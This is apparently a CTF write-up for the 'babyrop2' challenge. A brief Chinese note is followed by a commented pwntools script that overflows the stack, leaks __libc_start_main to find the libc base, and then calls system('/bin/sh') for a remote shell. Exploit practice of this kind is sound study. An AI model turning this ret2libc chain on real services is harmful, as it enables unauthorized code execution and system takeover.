ret2libc。记一下：因为这里的 libc 版本为 libc6_2.27-3ubuntu1.2_amd64，printf() 的 plt 表地址结尾为 f00，会产生截断，所以不能用 printf() 泄露，可以使用 __libc_start_main。
from pwn import *

# Challenge binary for this writeup; every address below is read from it.
elf = ELF('./babyrop2')

# 0 = connect to the remote challenge instance (the default as written),
# 1 = run the binary locally against the system libc instead of the
# libc shipped with the challenge.
local = 0
if local == 1:
    io = process('./babyrop2')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn',25717)
    libc = ELF('libc.so.6')

printf_plt = elf.plt['printf']
printf_got = elf.got['printf']      # looked up but not used below
# GOT slot whose contents (a pointer into libc) are leaked in stage 1.
# Per the note above, printf's own entry is not used for the leak.
libc_start_main = elf.got['__libc_start_main']
# Fixed 0x400xxx addresses: the binary is presumably non-PIE (confirm with
# checksec); with PIE these would have to be leaked as well.
main_addr = 0x400636
rdi_ret = 0x0000000000400733        # presumably a `pop rdi ; ret` gadget — confirm in the binary

# Stage 1: 0x20 bytes of filler, one more qword of filler (0xdeadbeef,
# presumably the saved rbp), then the return address is replaced by a
# chain that prints the GOT entry and returns to main so the process can
# be driven a second time.
# NOTE: str + bytes concatenation here and .next() below only work on
# Python 2 / the old pwntools API; this script does not run on Python 3 as is.
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(libc_start_main)+p64(printf_plt)+p64(main_addr)
io.sendline(payload)
io.recvline()
# The pointer comes back as 6 bytes (the top two bytes of a user-space
# x86-64 address are zero); pad back to 8 before unpacking.
libc_start_main_addr = u64(io.recv(6)+'\x00\x00')
# Leaked runtime address minus the symbol's offset in the libc image gives
# the load base; this is the ASLR bypass the whole chain depends on.
libc_base = libc_start_main_addr - libc.symbols['__libc_start_main']
log.success("libc_base:"+hex(libc_base))

# Stage 2: resolve system() and a "/bin/sh" string relative to the leaked
# base and reuse the same overflow, this time calling system("/bin/sh").
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(binsh)+p64(system_addr)
io.sendline(payload)
io.interactive()